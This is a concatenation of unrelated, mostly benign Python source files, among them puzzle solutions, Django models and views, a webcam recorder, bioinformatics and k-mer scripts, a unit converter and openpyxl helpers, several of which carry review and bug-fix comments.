        # Exclusive lower bounds of the rectangle to mark (clamped at -1)
        rangey = max(-1, y - Q)
        rangex = max(-1, x - P)
        done = False
        c += 1
        print c, y, rangey, x, rangex
        for j in range(y, rangey, -1):
            for i in range(x, rangex, -1):
                if matrix[i,j] == 1:
                    # Already marked: the rest of this row (and, if we are
                    # still on the dead cell's own column, all further rows)
                    # was handled by an earlier dead cell.
                    if i == x:
                        done = True
                    rangex = i
                    break
                matrix[i,j] = 1
            if done:
                break
    #print matrix
    count = 0
    for i in range(W-P+1):
        for j in range(H-Q +1):
            if matrix[i,j] == 0:
                count += 1
    return count
def dumbsol(W, P, H, Q, deads):
    """Brute force: count the P x Q anchor positions inside a W x H grid
    whose window contains no dead cell (used as a reference answer)."""
    count = 0
    for i in range(W - P + 1):
        for j in range(H - Q + 1):
            # The window anchored at (i, j) spans rows i..i+P-1 and
            # columns j..j+Q-1; any() short-circuits like the old break.
            blocked = any(
                i <= dead[0] < i + P and j <= dead[1] < j + Q
                for dead in deads
            )
            if not blocked:
                count += 1
    return count
if __name__ == '__main__':
    # Read the test-case file named on the command line: first line is the
    # number of cases, each further line holds the 11 integer parameters.
    # (Python 2: print statement; the file handle is never closed.)
    filep = open(sys.argv[1])
    t = int(filep.readline())
    for l in range(t):
        #for l in range(1):
        W, H, P, Q, N, X, Y, a, b, c, d = map(int, filep.readline().split())
        ans = solution(W, H, P, Q, N, X, Y, a, b, c, d)
        print 'Case #%d: %s' % (l+1, ans)
|
class Solution(object):
    """LeetCode 90 (Subsets II): all unique subsets of a multiset."""

    def subsetsWithDup(self, nums):
        """
        :type nums: List[int]
        :rtype: List[List[int]]
        """
        # Sorting groups duplicates so they can be skipped per tree level.
        nums.sort()
        subsets = []
        self.calSubset(nums, 0, [], subsets)
        return subsets

    def calSubset(self, nums, start, cur, result):
        # Every prefix path reached is itself a valid subset.
        result.append(cur)
        for idx in range(start, len(nums)):
            # Skip a value equal to its predecessor at the same depth,
            # otherwise duplicate subsets would be generated.
            if idx > start and nums[idx] == nums[idx - 1]:
                continue
            self.calSubset(nums, idx + 1, cur + [nums[idx]], result)
|
#!/usr/bin/env python
import sys
import argparse
import glob
import os
import numpy as np
from fastq_reader import Fastq_Reader
# FUNC
def interface():
    """Build and evaluate the command-line interface for the hashing job.

    Returns the parsed argparse namespace with IN (input directory),
    OUT (output directory) and task_rank (1-based job rank).
    """
    parser = argparse.ArgumentParser(description="Creates the hash function.")
    parser.add_argument('-i', required=True, dest='IN', type=str,
                        metavar='<input_dir>', help='The input directory.')
    parser.add_argument('-o', required=True, dest='OUT', type=str,
                        metavar='<output_dir>', help='The output directory.')
    parser.add_argument('-r', required=True, dest='task_rank', type=int,
                        help='Task rank of the current job.')
    return parser.parse_args()
def unique(array):
    """Return the elements of *array* with duplicates removed, preserving
    first-seen order (elements must be hashable)."""
    # dict keys are unique and keep insertion order (Python 3.7+).
    return list(dict.fromkeys(array))
# MAIN
if __name__ == "__main__":
    args = interface()
    # Normalise both directories to absolute paths with a trailing slash
    input_dir = os.path.abspath(args.IN)
    if not input_dir.endswith('/'):
        input_dir += '/'
    output_dir = os.path.abspath(args.OUT)
    if not output_dir.endswith('/'):
        output_dir += '/'
    # Task ranks are 1-based (cluster scheduler style); convert to 0-based
    task_rank = args.task_rank - 1
    # Collect the distinct sample prefixes of the *.hashq.* chunk files
    FP = glob.glob(os.path.join(input_dir,'*.hashq.*'))
    FP = [fp[fp.rfind('/')+1:] for fp in FP]
    FP = list(unique([fp[:fp.index('.')] for fp in FP]))
    # Each array job handles exactly one sample, chosen by task rank
    file_prefix = FP[task_rank]
    hashobject = Fastq_Reader(input_dir, output_dir)
    # Merge the per-chunk kmer counts and record the nonzero bin indices
    H = hashobject.merge_count_fractions(file_prefix)
    H = np.array(H, dtype=np.uint16)
    nz = np.nonzero(H)[0]
    np.save(hashobject.output_path + file_prefix + '.nonzero.npy', nz)
    print('Sample {0} has {1} nonzero elements and {2} total observed kmers'.format(file_prefix, len(nz), H.sum()))
# This is a very simple, minimal python script to capture video through
# a webcam and save it to a hard drive. Use a filename to test w/o webcam.
import cv2

cap = cv2.VideoCapture(0) # need a webcam for this to work or replace 0 w/ filename
# Frame size reported by the capture device; the writer needs it up front
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
# Your VideoWriter Codec may vary info here:
# https://www.pyimagesearch.com/2016/02/22/writing-to-video-with-opencv/
writer = cv2.VideoWriter('captured.avi', cv2.VideoWriter_fourcc(*'XVID'),20,(w,h))

while True:
    ret,frame = cap.read()
    # NOTE(review): ret is never checked — if the capture fails, frame is
    # None and write/imshow will raise. Acceptable for a demo; confirm.
    writer.write(frame)
    cv2.imshow('frame',frame)
    # hit the q key to exit
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break

# Release the camera and flush/close the output file
cap.release()
writer.release()
cv2.destroyAllWindows()
|
# B-2
# Read a row count and a column count (Japanese prompts: "enter rows" /
# "enter columns"), then print the corresponding multiplication table.
line = int(input('行列を入力してください: '))
column = int(input('列を入力してください: '))
for i in range(1, line + 1):
    for j in range(1, column + 1):
        # Values in a row are space-separated; newline after each row
        print(i * j, end=' ')
    print()
|
import random

# Reverse a position-dependent Caesar-style cipher: with the PRNG seeded to
# the fixed string "random", each alphanumeric character is shifted back by
# the next pseudo-random offset; other characters pass through unchanged.
# Fix: `print flag` was Python 2 statement syntax — the rest of the script
# is already Python 3 compatible, so use the function form (valid on both).
encoded = "BNZQ:1l36de9583w5516fv3b8691102224f3e"
flag = ""
random.seed("random")
for c in encoded:
    if c.islower():
        flag += chr((ord(c) - ord('a') - random.randrange(0, 26) + 26) % 26 + ord('a'))
    elif c.isupper():
        flag += chr((ord(c) - ord('A') - random.randrange(0, 26) + 26) % 26 + ord('A'))
    elif c.isdigit():
        flag += chr((ord(c) - ord('0') - random.randrange(0, 10) + 10) % 10 + ord('0'))
    else:
        flag += c
print(flag)
"""Generate the models file."""
# pylint: disable=useless-import-alias
import dataclasses
import typing
from open_alchemy import facades
from open_alchemy import types as oa_types
from . import model as _model
from . import models as _models
from . import types as types
class ModelsFile:
    """Registry of model schemas that can be rendered into a models file."""

    def __init__(self):
        """Construct an empty registry."""
        self._models: typing.Dict[str, oa_types.Schema] = {}

    def add_model(self, schema: oa_types.Schema, name: str) -> None:
        """
        Add model to be tracked.

        The first schema registered under a given name wins; a later
        registration with the same name is ignored.

        Args:
            schema: The schema of the model.
            name: The name of the model.

        """
        self._models.setdefault(name, schema)

    def generate_models(self) -> str:
        """
        Generate the models file.

        Returns:
            The source code for the models file.

        """
        # Render each tracked model, combine them into one module, then
        # run the result through the code formatter.
        model_sources = [
            _model.generate(schema=schema, name=name)
            for name, schema in self._models.items()
        ]
        raw_source = _models.generate(models=model_sources)
        return facades.code_formatter.apply(source=raw_source)
|
#!/usr/bin/env python3
class GeoCompensate():
    """Collapse sufficiently small bounding boxes to their centre point."""

    # The approximate area of Yarra, the smallest district in our LGA file
    THRESHOLD = 0.00205152

    def geoCompensate(self, box):
        """Return [centre_x, centre_y] when the box area is at most
        THRESHOLD; otherwise return an empty list.

        `box` is a sequence of corner points where box[0] is the
        (xmin, ymin) corner and box[2] the (xmax, ymax) corner.
        """
        xmin, ymin = box[0][0], box[0][1]
        xmax, ymax = box[2][0], box[2][1]
        if (ymax - ymin) * (xmax - xmin) > self.THRESHOLD:
            return []
        return [(xmax + xmin) / 2, (ymax + ymin) / 2]
|
import solution
import os

# Smoke test: build a Solver over the sample image directory and run a
# single prediction on one known image.
dir_with_images = 'smiles'
test_image = '1a.jpg'
sol = solution.Solver(dir_with_images)
print(sol.predict(os.path.join(dir_with_images,test_image)))
#!/usr/bin/env python
# -*- coding: utf-8; -*-
import random
from time import time
num = 1000
def init():
    """Build a list of `num` pseudo-random ints in [0, num), seeding the
    generator from the current clock."""
    random.seed( int( time()))
    return [int(random.random() * num) for _ in range(0, num)]
def sort(li):
    """Sort *li* in place (ascending) with gap-based selection passes and
    return it.

    Gap sequence h[n+1] = 3*h[n] + 1 (1, 4, 13, 40, ...). For each gap g
    (largest useful gap first), position j is given the minimum of the chain
    li[j], li[j+g], li[j+2g], ...; the final pass with g == 1 degenerates to
    a full selection sort, which guarantees the result is ordered.

    Fixes: removed the dead ``i -= 1`` (a for-loop variable is reassigned on
    every iteration, so decrementing it had no effect) and replaced the
    ``range(...)[::-1]`` slice with the idiomatic ``reversed``.
    """
    li_len = len(li)
    # h[n+1] = 3*h[n] + 1
    h = [1, 4, 13, 40, 121, 364, 1093, 3280, 9841, 29524, 88573, 265720,
         797161, 2391484, 7174453, 21523360, 64570081, 193710244,
         581130733, 1743392200, 5230176601, 15690529804, 47071589413,
         141214768240, 423644304721, 1270932914164, 3812798742493,
         11438396227480, 34315188682441, 102945566047324]
    for g in reversed(h):
        if li_len <= g:
            continue  # gap does not fit in the list: nothing to do
        j = 0
        while j + g < li_len:
            k = j + g
            while k < li_len:
                if li[j] > li[k]:
                    li[j], li[k] = li[k], li[j]
                k += g
            j += 1
    return li
if __name__ == '__main__':
    # Time one sort of a fresh random list. (Python 2 print statements.)
    t = time()
    print sort( init())
    print time() - t
|
import jieba
import string
import nltk
def get_chinese_characters(raw):
    """Return list of Chinese characters in sentence.

    :param raw: raw chinese text
    :return: list with one entry per character of *raw*
    """
    # Bug fix: the original returned list(sentence), but no `sentence`
    # variable exists — every call raised NameError. The parameter is `raw`.
    return list(raw)
def get_chinese_words(raw):
    """Return list of Chinese words in sentence without stopwords.

    :param raw: raw chinese text
    :return: jieba tokens of *raw* with stop words filtered out
    """
    # Fix: the file handle was opened and never closed; use a context manager.
    with open("C:/Users/ASUS/Desktop/Thesis/stop_words/stop_words.txt") as f:
        stop_words = f.read()
    # NOTE(review): `tok not in stop_words` is a *substring* test against the
    # whole stop-word file (preserved from the original), so any token that
    # appears anywhere in the file — even inside a longer stop word — is
    # dropped. Confirm this is intended; a set of lines would be stricter.
    tokens = jieba.lcut(raw)
    result = [i for i in tokens if not i in stop_words]
    return result
def get_chinese_character_positions(raw):
    """Return a list of characters with their positions in the words.

    :param raw: raw chinese text
    :return: one '<char><index>' string per character of each word
    """
    positions = []
    for word in get_chinese_words(raw):
        for idx, char in enumerate(word):
            positions.append(u'{}{}'.format(char, idx))
    return positions
def get_topic_distribution(lda_model, raw_input, dictionary):
    """Return a vector of the topical distribution of one document.

    :param lda_model: output of gensim.models.ldamodel.LdaModel
    :param raw_input: raw chinese policy text or doc
    :param dictionary: output of corpora.Dictionary(), i.e. the vocab
    """
    # The model expects tokenized input in bag-of-words form.
    tokens = get_chinese_words(raw_input)
    unseen_doc = dictionary.doc2bow(tokens)
    return lda_model[unseen_doc][0]
def get_NdaysAgo_Data_from(today, date_col, df, days):
    """Retrieves data N-days ago.

    :param today: format = 'YYYY-MM-DD'
    :param date_col: the df's date column (datetime64) to filter on
    :param df: source dataframe
    :param days: n days ago
    :return: df rows with date strictly between (today - days) and today
    """
    # BUG FIX: this module never imports pandas, so `pd` raised NameError
    # at call time; keep the import local to avoid touching module scope.
    import pandas as pd
    today = pd.to_datetime(today)
    begin = today - pd.offsets.Day(days)
    # NOTE: both bounds are exclusive, mirroring the original behaviour
    # (and differing from the inclusive bounds of get_NdaysAhead_Data_from).
    return df[(date_col < today) & (date_col > begin)]
def get_NdaysAhead_Data_from(today, date_col, df, days):
    """Retrieves data N-days ahead in the future, relative to `today`.

    :param today: format = 'YYYY-MM-DD'
    :param date_col: your 'date' column (datetime64) format
    :param df: source dataframe
    :param days: n days in the future
    :return: df rows with today <= date <= today + days (both inclusive)
    """
    # BUG FIX: this module never imports pandas, so `pd` raised NameError
    # at call time; keep the import local to avoid touching module scope.
    import pandas as pd
    today = pd.to_datetime(today)
    end = today + pd.offsets.Day(days)
    return df[(date_col >= today) & (date_col <= end)]
|
# conversion program
# written by Kurtis Norman
# 2nd May 2021
# importing the sleep function to allow timed breaks before code is displayed
import time
# defining all functions and creating a variable for each one
def Kilograms(kg):
    """Convert kilograms to pounds (1 kg ~= 2.2 lb)."""
    return kg * 2.2

def Pounds(lb):
    """Convert pounds to kilograms."""
    return lb / 2.2

def Kilometer(km):
    """Convert kilometers to miles (1 mi ~= 1.61 km)."""
    return km / 1.61

def Mile(m):
    """Convert miles to kilometers."""
    return m * 1.61

def Celcius(c):
    """Convert degrees Celsius to Fahrenheit."""
    return (c * 1.8) + 32

def Fahrenheit(f):
    """Convert degrees Fahrenheit to Celsius."""
    return (f - 32) / 1.8
# Greet the user once at start-up.
print("Hello there.\n")
# Main menu loop; runs until the process is killed (there is no quit option).
while True:
    # Brief pause so the previous output is readable before the next prompt.
    time.sleep(1)
    # Ask which unit pair to convert between.
    choice=int(input("What would you like to convert?\n1) Kilograms and Pounds\n2) Kilometers and Miles\n3) Celcius and Farenheit\n answer: "))
    if choice == 1:
        # Direction of the mass conversion.
        convert=int(input("Please pick an option\n1) Kilograms to Pounds\n2) Pounds to Kilograms\n choice: "))
        if convert == 1:
            # float() lets the user enter decimals.
            kg=Kilograms(float(input("\nEnter how many kilograms you would like to convert: ")))
            time.sleep(0.5)
            print("\n")
            # Result rounded to 2 decimal places.
            print("The amount you entered in kilograms is",round(kg,2), "pounds.\n")
        if convert == 2:
            lb=Pounds(float(input("Enter how many pounds you would like to convert: ")))
            time.sleep(0.5)
            print("\n")
            print("The amount you entered in pounds is",round(lb,2), "kilograms.\n")
    elif choice == 2:
        # Direction of the distance conversion.
        convert2=int(input("\nPlease pick an option\n1) Kilometers to Miles\n2) Miles to Kilometers\n choice: "))
        if convert2 == 1:
            km=Kilometer(float(input("\nEnter how many kilometers you would like to convert: ")))
            time.sleep(0.5)
            print("\n")
            print("The amount you entered in kilometers is",round(km,2), "miles.\n")
        if convert2 == 2:
            m=Mile(float(input("\nEnter how many miles you would like to convert: ")))
            time.sleep(0.5)
            print("\n")
            print("The amount you entered in miles is",round(m,2), "kilometers.")
    # NOTE(review): any answer other than 1 or 2 falls through to the
    # temperature branch -- presumably this was meant to be `elif choice == 3`;
    # confirm before tightening.
    else:
        # Direction of the temperature conversion.
        convert3 = int(input("\nPlease pick an option\n1) Celcius to Fahrenheit\n2) Fahrenheit to Celcius\n choice: "))
        if convert3 == 1:
            c=Celcius(float(input("\nEnter how many degrees celcius would you like to convert: ")))
            time.sleep(0.5)
            print("\n")
            print("The amount you entered in celcius is",round(c,2), "fahrenheit.")
        if convert3 == 2:
            f=Fahrenheit(float(input("\nEnter how many degrees fahrenheit would you like to convert: ")))
            time.sleep(0.5)
            print("\n")
            print("The amount you entered in fahrenheit is",round(f,2), "celcius.")
|
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.http import HttpResponse
import json
from models import PhotoGallery, VideoGallery, VideoFile
from seafoodservice import settings
from information.views import set_required_data
def gallery(request):
    """Render the gallery page with all gallery photos and videos.

    Photos are paired with a 1-based index for the template; each video
    gallery entry is a dict with its related VideoFile rows attached.
    """
    photos = PhotoGallery.objects.filter(add_this_photo_to_gallery=True)
    videos = []
    for gallery_entry in VideoGallery.objects.all():
        entry = gallery_entry.to_dict()
        # Attach the related video files to each gallery entry.
        entry.update({'videos': VideoFile.objects.filter(video=gallery_entry).values()})
        videos.append(entry)
    context = {
        "photos": zip(range(1, len(photos)+1), photos),
        "videos": videos
    }
    # BUG FIX: removed a leftover debug `print context` (Python 2 print
    # statement) that dumped the whole context on every request.
    context.update(set_required_data(request))
    return render_to_response('gallery.html',
                              context,
                              context_instance=RequestContext(request))
def get_slide_images(request):
    """Render the slider view with URLs of every photo flagged for the slide."""
    slide_photos = PhotoGallery.objects.filter(add_this_photo_to_slide=True)
    context = {
        "slides": [settings.MEDIA_URL + photo.photo.name for photo in slide_photos],
    }
    return render_to_response('slider_view.html',
                              context,
                              context_instance=RequestContext(request))
|
#!/bin/env python
import sys
# Usage: script.py <tandem_repeat_file> <hap1_alignments> <hap2_alignments>
tandem_repeatfn = sys.argv[1]
hap1_fn = sys.argv[2]
hap2_fn = sys.argv[3]
# Rows keyed by (chrom, start, end, motif_size, number_of_motifs); haplotype
# columns are appended by add_haplotype_info().
output = {}
def score_alignment(ref,query):
    """Return the fraction of positions where `ref` and `query` agree,
    case-insensitively, compared over the shorter of the two strings.

    BUG FIX: in the original, `alignment += 1.0` was indented inside the
    match `if`, so `score == alignment` whenever any position matched
    (always returning 1.0) and the function raised ZeroDivisionError when
    nothing matched.  The denominator now counts every compared position,
    and empty input returns 0.0 instead of dividing by zero.
    """
    pairs = list(zip(ref, query))
    if not pairs:
        # No overlap to compare: define the score as 0.0.
        return 0.0
    matches = sum(1.0 for r, q in pairs if r.upper() == q.upper())
    return matches / len(pairs)
def add_haplotype_info(hap_fn):
    """Append per-haplotype alignment columns to the global `output` rows.

    Each line of `hap_fn` is tab-separated: columns 1 and 2 both carry the
    locus id (sanity-checked equal), followed by motif and flank sequences.
    """
    with open(hap_fn, 'r') as hap_fh:
        for index,line in enumerate(hap_fh):
            line = line.rstrip().split('\t')
            id_1 = line[1]
            id_2 = line[2]
            motif_seq = line[3]
            number_of_motifs = line[4]
            perfect_motif_locus = line[5]
            query_motif_locus = line[6]
            ref_left_flank = line[7]
            query_left_flank = line[8]
            # NOTE(review): the right flank reuses columns 7/8, identical to
            # the left flank -- looks like a copy-paste bug (columns 9/10?).
            # Confirm against the producer of this file before changing.
            ref_right_flank = line[7]
            query_right_flank = line[8]
            assert id_1 == id_2
            motif_score = score_alignment(perfect_motif_locus,query_motif_locus)
            left_flank_score = score_alignment(ref_left_flank,query_left_flank)
            right_flank_score = score_alignment(ref_right_flank,query_right_flank)
            items_to_add = [number_of_motifs,motif_score,left_flank_score,right_flank_score,
                            perfect_motif_locus,query_motif_locus,
                            ref_left_flank,query_left_flank,
                            ref_right_flank,query_right_flank]
            # The locus id encodes the output key: chrom_start_end_size_count.
            # (number_of_motifs read from column 4 above is overwritten here.)
            motif_info = id_1.split("_")
            chrom = motif_info[0]
            start = motif_info[1]
            end = motif_info[2]
            motif_size = motif_info[3]
            number_of_motifs = motif_info[4]
            for item in items_to_add:
                # NOTE(review): raises KeyError if this locus is absent from
                # the tandem repeat file loaded at module level.
                output[(chrom,start,end,motif_size,number_of_motifs)].append(item)
# Seed `output` with one base row per locus from the tandem repeat file.
with open(tandem_repeatfn,'r') as tandem_repeatfh:
    for line in tandem_repeatfh:
        line = line.rstrip().split('\t')
        chrom = line[0]
        start = line[1]
        end = line[2]
        motif_size = line[3]
        number_of_motifs = line[4]
        motif_seq = line[6]
        output[(chrom,start,end,motif_size,number_of_motifs)] = [chrom,start,end,motif_size,number_of_motifs,motif_seq]
# Append haplotype 1 then haplotype 2 columns to each row.
add_haplotype_info(hap1_fn)
add_haplotype_info(hap2_fn)
header = ["chrom","start","end","motif_size","number_of_motifs","motif_seq",
          "hap_1_number_of_motifs","hap_1_motif_score","hap_1_left_flank_score","hap_1_right_flank_score",
          "hap_1_perfect_motif_locus","hap_1_query_motif_locus",
          "hap_1_ref_left_flank","hap_1_query_left_flank",
          "hap_1_ref_right_flank","hap_1_query_right_flank",
          "hap_2_number_of_motifs","hap_2_motif_score","hap_2_left_flank_score","hap_2_right_flank_score",
          "hap_2_perfect_motif_locus","hap_2_query_motif_locus",
          "hap_2_ref_left_flank","hap_2_query_left_flank",
          "hap_2_ref_right_flank","hap_2_query_right_flank"]
# Emit a TSV to stdout (Python 2 print statements).
print "\t".join(header)
for index in output:
    # Skip loci that did not receive a full set of columns from both haplotypes.
    if len(header) != len(output[index]):
        continue
    out_line = output[index]
    print "\t".join(map(str,out_line))
|
import subprocess
import re
import platform
#returns ip as string value
def return_ip():
    """Return this machine's IPv4 address as a string, parsed from
    `ipconfig` (Windows) or `ifconfig` (other platforms).

    :raises AttributeError: if the expected pattern is not found in the
        command output (match is None).
    """
    if platform.system() == "Windows":
        # BUG FIX: on Python 3, check_output returns bytes, and re.search
        # with a str pattern against bytes raises TypeError -- decode first.
        out = subprocess.check_output("ipconfig").decode(errors="replace")
        ip = re.search(' IPv4 Address. . . . . . . . . . . : (.+?)\n Subnet', out)
        return ip.group(1).strip()
    else:
        out = subprocess.check_output("ifconfig").decode(errors="replace")
        # NOTE(review): 'inet addr:' is the legacy net-tools ifconfig
        # format; modern distros print 'inet x.x.x.x' -- confirm target OS.
        ip = re.search('inet addr:(.+?) Bcast', out)
        return ip.group(1)
|
from flask import Flask
def create_app():
    """Application factory: build the Flask app and register the views."""
    application = Flask(__name__)

    # Imported here (not at module level) to avoid a circular import.
    from app.views import get_view, post_view

    get_view.init_app(application)
    post_view.init_app(application)
    return application
|
from django.db import models
from users.models import MyUser
from posts.models import AnswerPost, WalkthroughPost, QuestionPost, WalkthroughComment
# Create your models here.
class Notification(models.Model):
    """A user-mention notification.

    Links the mentioned user to the content they were mentioned in.  The
    four content FKs are all optional; presumably exactly one is set per
    notification -- confirm with the creation sites.
    """
    # The user being notified.
    mentioned = models.ForeignKey(MyUser, on_delete=models.CASCADE, related_name='mentioned')
    # Optional links to the content the mention occurred in.
    walkthrough_post = models.ForeignKey(WalkthroughPost, on_delete=models.CASCADE, related_name='walkthrough_post', blank=True, null=True)
    question_post = models.ForeignKey(QuestionPost, on_delete=models.CASCADE, related_name='question_post', blank=True, null=True)
    comment_post = models.ForeignKey(WalkthroughComment, on_delete=models.CASCADE, related_name='comment_post', blank=True, null=True)
    answer_post = models.ForeignKey(AnswerPost, on_delete=models.CASCADE, related_name='answer_post', blank=True, null=True )
    # Whether the user has viewed this notification.
    seen = models.BooleanField(default=False)
    def __str__(self):
        return self.mentioned.username
from functools import reduce
from collections import Counter
if __name__ == '__main__':
    # Get the input data: one line per person; blank lines separate groups.
    with open('inputs/day_06.txt') as f:
        file_data = f.readlines()

    # Part 1: for each group, count the distinct questions anyone answered.
    tracker_list = []
    group_set = set()
    counter = []
    for i, line in enumerate(file_data):
        chars = line.replace('\n', '')
        if chars == '':
            # A blank line closes the current group.
            tracker_list.append(group_set)
            counter.append(len(group_set))
            group_set = set()
        else:
            # set.update replaces the original per-character add loop.
            group_set.update(chars)
        if i + 1 == len(file_data):
            # Flush the final group (the file may not end with a blank line).
            tracker_list.append(group_set)
            counter.append(len(group_set))
    # sum() replaces reduce(lambda x, y: x + y, ...): same result, clearer,
    # and it no longer raises TypeError on an empty input file.
    print(f"Answer to part 1: {sum(counter)}")

    # Part 2: for each group, count the questions *everyone* answered.
    num_in_group = 0
    group_string = ''
    tracker_list = []
    for i, line in enumerate(file_data):
        chars = line.replace('\n', '')
        if chars == '':
            tracker_list.append({'num_in_group': num_in_group, 'group_count': Counter(group_string)})
            group_string = ''
            num_in_group = 0
        else:
            num_in_group += 1
            group_string += chars
        if i + 1 == len(file_data):
            tracker_list.append({'num_in_group': num_in_group, 'group_count': Counter(group_string)})
    count_list = []
    for detail_dict in tracker_list:
        num_in_group = detail_dict['num_in_group']
        group_count = detail_dict['group_count']
        # A question counts only when every member of the group answered it.
        answered_by_all = [q for q in group_count if group_count[q] == num_in_group]
        count_list.append(len(answered_by_all))
    print(f"Answer to part 2: {sum(count_list)}")
|
import os, operator, sys, argparse
def formatFileSize(num):
    """Return `num` bytes as a human-readable string, e.g. '3.5 MB'.

    BUG FIX: sizes of 1024 TB or more previously fell off the loop and
    returned None; they are now reported in PB.
    """
    for label in ['bytes', 'KB', 'MB', 'GB', 'TB']:
        if num < 1024.0:
            return "%3.1f %s" % (num, label)
        num /= 1024.0
    return "%3.1f %s" % (num, 'PB')
def listFilesSize(args):
    """Print every file under args.dir with its size, largest first."""
    # Guard clauses replace the original nested if/else pyramid.
    if not args.dir:
        print("Please supply target directory using --dir")
        return
    if not os.path.exists(args.dir):
        print("The supplied directory does not exist")
        return
    for path, size in getSortedFilesListWithSize(args.dir):
        print(path, formatFileSize(size))
def getSortedFilesListWithSize(folderPath):
filesList = (os.path.join(basedir, filename) for basedir, dirs, files in os.walk(folderPath) for filename in files)
filesWithSize = ((path, os.path.getsize(path)) for path in filesList)
filesWithSize = sorted(filesWithSize, key = operator.itemgetter(1), reverse=True)
return filesWithSize
def parseArguments():
    """Parse command-line arguments; --dir (required) names the directory."""
    arg_parser = argparse.ArgumentParser(description='Files Size List')
    arg_parser.add_argument('-V', '--version', action='version', version='0.0.1')
    arg_parser.add_argument("-d", "--dir", help="Supplied directory to analyze", type=str, required=True)
    return arg_parser.parse_args()
if __name__ == '__main__':
    # Entry point: parse --dir and print the size-sorted file listing.
    args = parseArguments()
    listFilesSize(args)
import sys
sys.path.append('./')
from utils.filename import calculateFileName
# Resolve the puzzle input file from argv and read it whole.
# NOTE(review): `input` shadows the builtin of the same name.
filename = calculateFileName(sys.argv)
f = open(filename, "r")
input = f.read()
lines = input.split('\n') # even though the input will have only 1 line, it is used for testing
def skipTrash(line, index, skippedTrash):
    """Scan garbage starting at `index` until the closing '>'.

    Returns (index_of_closing_gt, updated_trash_count).

    Fixes two defects in the original:
    * '!' now cancels the *following* character, matching how
      checkInnerGroup treats '!' (net advance of two).  Previously it
      advanced only one position, so the canceled character was still
      processed -- it could terminate the garbage early or be counted.
    * Reaching end-of-line without a '>' now returns a tuple instead of
      implicitly returning None, which crashed the caller's unpacking.
    """
    while index < len(line):
        char = line[index]
        if char == '>':
            return (index, skippedTrash)
        if char == '!':
            index += 2  # skip the '!' and the character it cancels
        else:
            skippedTrash += 1
            index += 1
    return (index, skippedTrash)
def checkInnerGroup(line, index, depth, score, skippedTrash):
    """Recursively score a group whose '{' was consumed just before `index`.

    Returns (index, score, skippedTrash) where `index` points at this
    group's closing '}' and `score` has this group's `depth` added.
    """
    while index < len(line):
        if line[index] == '{':
            # Nested group: recurse one level deeper.
            (index, score, skippedTrash) = checkInnerGroup(line, index+1, depth + 1, score, skippedTrash)
        elif line[index] == '<':
            # Garbage: skip to its closing '>' and count skipped characters.
            (index, skippedTrash) = skipTrash(line, index + 1, skippedTrash)
        elif line[index] == '!':
            # '!' cancels the next character (this +1 plus the loop's +1).
            index +=1
        elif line[index] == '}':
            score += depth
            return(index, score, skippedTrash)
        index += 1
    # Unbalanced input: ran off the end without a closing '}'.
    return (index, score, skippedTrash)
for line in lines:
    index = 0
    # NOTE(review): `score`/`skippedTrash` are only assigned when the line
    # starts with '{'; a first line that does not would raise NameError at
    # the print below -- confirm inputs always open with a group.
    if line[index] =='{':
        (index, score, skippedTrash) = checkInnerGroup(line, index+1, 1, 0, 0)
    print(score, skippedTrash)
|
from django.db import models
from pubg_python import Shard
# Create your models here.
class Item(models.Model):
    """An in-game item with a display name and an image."""
    name = models.CharField(max_length=200)
    image = models.ImageField()
    def __str__(self):
        return self.name
class Player(models.Model):
    """A PUBG player, keyed by the API's player id."""
    player_id = models.CharField(max_length=200, primary_key=True)
    player_name = models.CharField(max_length=200)
    # Region shard stored as its string value (matched against pubg_python's
    # Shard enum in get_shard).
    shard = models.CharField(max_length=200, null=True)
    count = models.IntegerField()
    def get_shard(self):
        """Return the pubg_python Shard member whose value equals self.shard.

        NOTE(review): returns the int -1 (not None / an enum member) when no
        shard matches -- callers must special-case that sentinel.
        """
        for s in Shard:
            if s.value == self.shard:
                return s
        return -1
    def __str__(self):
        return self.player_name
class PlayerItem(models.Model):
    """Join table linking a Player to an Item."""
    player_id = models.ForeignKey(Player, on_delete=models.CASCADE)
    item_id = models.ForeignKey(Item, on_delete=models.CASCADE)
    def __str__(self):
        # BUG FIX: the original returned the related Item *instance*;
        # __str__ must return a str, so stringify the related item
        # (which yields its name via Item.__str__).
        return str(self.item_id)
class MatchChecked(models.Model):
    """Records a match id already processed for a given player."""
    player_id = models.ForeignKey(Player, on_delete=models.CASCADE)
    match_id = models.CharField(max_length=200)
    def __str__(self):
        return self.match_id
|
'''
@author: Vrushabh_Hukkerikar
'''
from openpyxl import load_workbook
from openpyxl.styles import PatternFill,colors,Font,NamedStyle
class ReadExcel(object):
    '''
    Thin helpers around openpyxl for reading/writing single cells and
    colouring cell backgrounds.  Each call re-opens (and, for writes,
    re-saves) the workbook, so these are convenience helpers, not fast ones.
    '''
    # Last worksheet object loaded; stored on the class, shared by instances.
    sheetname=""
    def GetCellData(self,ExcelFileLocation,Sheetname,column,row):
        """Return the computed value (data_only) of the cell at
        `column` + `row` (e.g. 'B' + '3') on sheet `Sheetname`."""
        wb = load_workbook(ExcelFileLocation,data_only=True)
        ReadExcel.sheetname = wb[Sheetname]
        CellLocation = column + row
        # print("reading")
        #print(ReadExcel.sheetname[CellLocation].value)
        return (ReadExcel.sheetname[CellLocation].value)
    def GetRowCount(self,ExcelFileLocation,SN1):
        """Return the number of used rows on sheet `SN1`."""
        #print(SN1)
        Sheetname1 = SN1
        wb = load_workbook(ExcelFileLocation)
        SN = wb[Sheetname1]
        row_count = SN.max_row
        return row_count
    def WriteExcel(self,ExcelFileLocation,Sheetname,colno,rowno,storingvalue):
        """Write `storingvalue` into a cell and save the workbook.

        NOTE(review): despite the parameter names, `colno` is passed as the
        *row* and `rowno` as the *column*; and the write targets the
        workbook's *active* sheet, not `Sheetname` -- confirm both are
        intended before relying on them.
        """
        wb = load_workbook(ExcelFileLocation,data_only=True)
        ReadExcel.sheetname = wb[Sheetname]
        #CellLocation = column + row
        sheetname=wb.active
        NewCell=sheetname.cell(row=colno, column=rowno)
        NewCell.value=storingvalue
        wb.save(ExcelFileLocation)
        return (NewCell.value)
    def GreenBgrColor(self,ExcelFileLocation,Sheetname,colno,rowno):
        """Fill a cell's background green and save.  Same row/column-swap
        and active-sheet caveats as WriteExcel."""
        wb = load_workbook(ExcelFileLocation,data_only=True)
        ReadExcel.sheetname = wb[Sheetname]
        sheetname=wb.active
        NewCell=sheetname.cell(row=colno, column=rowno)
